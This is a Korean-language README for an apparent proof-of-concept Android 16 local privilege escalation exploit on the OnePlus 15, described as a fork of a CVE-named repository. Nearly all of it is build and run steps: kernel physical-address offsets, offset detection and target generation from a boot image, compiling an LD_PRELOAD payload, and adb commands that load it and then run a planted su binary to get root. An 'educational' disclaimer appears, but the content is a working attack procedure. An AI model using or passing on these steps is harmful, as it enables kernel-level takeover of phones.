
# Android 16 로컬 권한 상승 교육용 PoC (OnePlus 15) OnePlus 15에서 Android 16 로컬 권한 상승을 위한 교육용 개념 증명으로, 커널 오프셋 탐지, 타깃 생성, LD_PRELOAD 기반 익스플로잇 빌드를 포함합니다.
경고: 이 저장소는 교육 및 연구 목적으로만 제공됩니다. 사전 빌드된 바이너리나 릴리스는 배포되지 않습니다. 모든 것을 소스에서 직접 빌드해야 합니다.
OnePlus 15용 Android 16 로컬 권한 상승.
x-spy/CVE-2026-43499-popsicle의 포크이며, kallsyms 정렬 수정 및 검증된 OnePlus 15 프로필이 포함되어 있습니다.
프로필에는 동일한 펌웨어를 실행하는 루팅된 장치에서 확인해야 하는 두 개의 물리적 주소가 포함되어 있습니다.
{
"p0_phys_offset": "0x80000000",
"p0_kernel_phys_load": "0xc7800000"
}
루팅된 장치로 자동 감지:
python3 detect_offset.py
Python 3 및 llvm-objdump 필요:
python3 generate_target.py \
--boot boot.img \
--profile profile_oneplus15.json \
-o source/src/target.h
make -C source clean preload
NDK가 자동으로 감지되지 않는 경우:
NDK_ROOT=/path/to/android-ndk make -C source clean preload
출력: source/build/bin/preload.so
adb push source/build/bin/preload.so /data/local/tmp/preload.so
adb shell chmod 0644 /data/local/tmp/preload.so
adb shell LD_PRELOAD=/data/local/tmp/preload.so /system/bin/true
adb shell /data/local/tmp/su -c id